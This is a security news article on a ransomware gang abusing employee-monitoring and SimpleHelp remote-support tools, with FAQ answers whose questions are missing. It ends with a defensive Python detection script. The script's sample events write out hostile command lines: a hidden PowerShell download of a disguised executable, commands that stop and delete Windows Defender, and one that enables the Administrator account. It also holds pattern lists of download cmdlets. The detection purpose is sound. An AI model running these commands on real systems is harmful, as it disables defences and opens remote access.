Gugu Ntsele February 12, 2026
A member of the Crazy ransomware gang is exploiting legitimate employee monitoring software and remote support tools to infiltrate corporate networks, evade detection, and establish persistent access before deploying ransomware.
Security researchers investigated multiple intrusions in which threat actors deployed Net Monitor for Employees Professional and the SimpleHelp remote support tool to breach corporate networks. In one attack, the hackers installed Net Monitor for Employees Professional using the Windows Installer utility, deploying the monitoring agent directly from the developer's site onto compromised systems. This gave the attackers the ability to remotely view victims' desktops, transfer files, and execute commands. For redundant access, the attackers downloaded the SimpleHelp remote access client via PowerShell commands, disguising it with filenames resembling legitimate Visual Studio files. The attackers attempted to enable local administrator accounts and disabled Windows Defender by stopping and deleting its associated services. Both breaches were enabled through compromised SSL VPN credentials.
The abuse of SimpleHelp for ransomware attacks is not an isolated incident. In 2025 the DragonForce ransomware operation breached a managed service provider and used its SimpleHelp remote monitoring and management platform to steal data and deploy encryptors on downstream customers' systems. The DragonForce attackers used SimpleHelp to perform reconnaissance on customer systems, collecting information about the MSP's customers, including device names, configuration, users, and network connections before attempting to steal data and deploy encryptors.
The attackers configured monitoring rules in SimpleHelp to track specific activities:
According to security researchers, "The logs show the agent continuously cycling through trigger and reset events for cryptocurrency-related keywords, including wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer."
The researchers further explained that "Alongside these, the agent also monitored for remote access tool keywords, including RDP, anydesk, ultraview, teamview, and VNC, likely to detect if anyone was actively connecting to the machine."
Employee monitoring software is designed for legitimate business purposes, allowing employers to track productivity, view employee screens, and manage remote workers. These tools include features like screen recording, keystroke logging, and file transfer capabilities. SimpleHelp is a legitimate remote support tool used by IT departments for troubleshooting and system maintenance. When threat actors abuse these tools, they blend in with normal administrative activity, making detection difficult. The use of legitimate software in cyberattacks is a tactic known as "living off the land," where attackers leverage existing, trusted tools rather than custom malware that might trigger security alerts.
This attack shows a pattern where ransomware gangs systematically exploit the same legitimate remote management tools trusted by healthcare organizations and MSPs. For healthcare organizations this is a problem because these monitoring tools are often used to manage medical devices, telehealth platforms, and electronic health records systems, giving attackers direct access to protected health information.
No, but organizations should maintain strict approval processes and continuously monitor for unauthorized installations.
Enable detailed audit logs for all remote access sessions, file transfers, command executions, and configuration changes, and integrate these logs into your SIEM for correlation analysis.
Cloud-based tools face similar abuse risks, but they may offer better visibility through centralized logging and vendor-managed security updates.
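The intrusion chain described above (an RMM agent installed through Windows Installer, a remote support client fetched by PowerShell under a misleading name, Defender services stopped and deleted, a local account re-enabled) is exactly the kind of activity the audit-log and SIEM correlation advice refers to. The following is an added example, not Paubox's code or any vendor's detection content: a small set of detection rules run over constructed process-creation records, with per-host correlation so that a single hit (which may be legitimate IT work) is distinguished from several hits on one machine. The record fields, the installer substrings, the Defender service names other than WinDefend, and every sample host, path and URL are assumptions made for the example.

```python
"""Detection rules for the legitimate-tool abuse pattern described in the article.

Added example, not the page's or any product's own code. Events are modelled on
what a SIEM normalises from Windows process-creation telemetry (Security 4688 /
Sysmon Event ID 1); field names are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: str        # ISO-8601 timestamp
    host: str
    user: str
    image: str     # full path of the executable that started
    cmdline: str   # its command line


# Products named in the article; how they appear in an installer command line is an assumption.
RMM_PRODUCTS = ("net monitor for employees", "simplehelp")
# WinDefend is the core Defender service; the other two names are assumptions for the example.
DEFENDER_SERVICES = ("windefend", "wdnissvc", "sense")
DOWNLOAD_CMDLETS = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
USER_WRITABLE = re.compile(r"\\(temp|appdata|public|downloads)\\", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_rmm_installer(ev):
    """msiexec.exe installing a monitoring/remote-support product, or any MSI straight from a URL."""
    if _basename(ev.image) != "msiexec.exe":
        return None
    cl = ev.cmdline.lower()
    if any(p in cl for p in RMM_PRODUCTS) or re.search(r"/i\s+https?://", cl):
        return "rmm_agent_install"
    return None


def rule_powershell_download(ev):
    """PowerShell fetching an executable into a user-writable directory."""
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    cl = ev.cmdline
    if DOWNLOAD_CMDLETS.search(cl) and USER_WRITABLE.search(cl) and re.search(r"\.exe\b", cl, re.I):
        return "powershell_exe_download"
    return None


def rule_defender_tamper(ev):
    """sc.exe stopping or deleting a Defender service (query/start are ignored)."""
    if _basename(ev.image) != "sc.exe":
        return None
    m = re.search(r"\b(stop|delete)\s+(\S+)", ev.cmdline, re.I)
    if m and m.group(2).strip('"').lower() in DEFENDER_SERVICES:
        return "defender_service_tamper"
    return None


def rule_local_account_enabled(ev):
    """net.exe re-enabling a local account, as done with the built-in administrator in the article."""
    if _basename(ev.image) not in ("net.exe", "net1.exe"):
        return None
    if re.search(r"\buser\b.*/active:yes", ev.cmdline, re.I):
        return "local_account_enabled"
    return None


RULES = (rule_rmm_installer, rule_powershell_download, rule_defender_tamper, rule_local_account_enabled)


def evaluate(events):
    """Map each host to the sorted list of distinct rule names that fired on it."""
    hits = defaultdict(set)
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                hits[ev.host].add(name)
    return {host: sorted(names) for host, names in hits.items()}


def correlate(events, threshold=2):
    """Hosts on which at least `threshold` distinct rules fired: one hit alone may be
    routine administration, several together match the chain described in the article."""
    return sorted(host for host, names in evaluate(events).items() if len(names) >= threshold)


# Constructed sample telemetry (not real events); hosts, users, URLs and file names are made up.
SAMPLE_EVENTS = [
    ProcEvent("2026-02-10T09:12:00Z", "ws-041", "CORP\\jdoe", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "https://vendor.example/Net Monitor for Employees Professional.msi" /qn'),
    ProcEvent("2026-02-10T09:15:30Z", "ws-041", "CORP\\jdoe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri https://support.example/agent.exe -OutFile C:\Users\Public\vs_community_setup.exe"'),
    ProcEvent("2026-02-10T09:20:05Z", "ws-041", "CORP\\jdoe", r"C:\Windows\System32\sc.exe", "sc.exe stop WinDefend"),
    ProcEvent("2026-02-10T09:20:07Z", "ws-041", "CORP\\jdoe", r"C:\Windows\System32\sc.exe", "sc.exe delete WinDefend"),
    ProcEvent("2026-02-10T09:22:41Z", "ws-041", "CORP\\jdoe", r"C:\Windows\System32\net.exe", "net user Administrator /active:yes"),
    # Authorised helpdesk rollout on a server: one rule fires, which the correlation step leaves alone.
    ProcEvent("2026-02-10T10:02:00Z", "srv-it-02", "CORP\\helpdesk", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Software\SimpleHelp-agent.msi" /qn'),
    ProcEvent("2026-02-10T10:05:00Z", "srv-it-02", "CORP\\helpdesk", r"C:\Windows\System32\sc.exe", "sc.exe query WinDefend"),
]

if __name__ == "__main__":
    for host, names in evaluate(SAMPLE_EVENTS).items():
        print(host, names)
    print("investigate:", correlate(SAMPLE_EVENTS))
```

The rules deliberately key on the tools the article names plus the generic steps around them (a download into a user-writable path, service deletion, account re-enablement), because the RMM install on its own is indistinguishable from an approved deployment; the `correlate` threshold is where the "strict approval process" meets the log data, and an inventory of approved installs per host would be the natural next refinement.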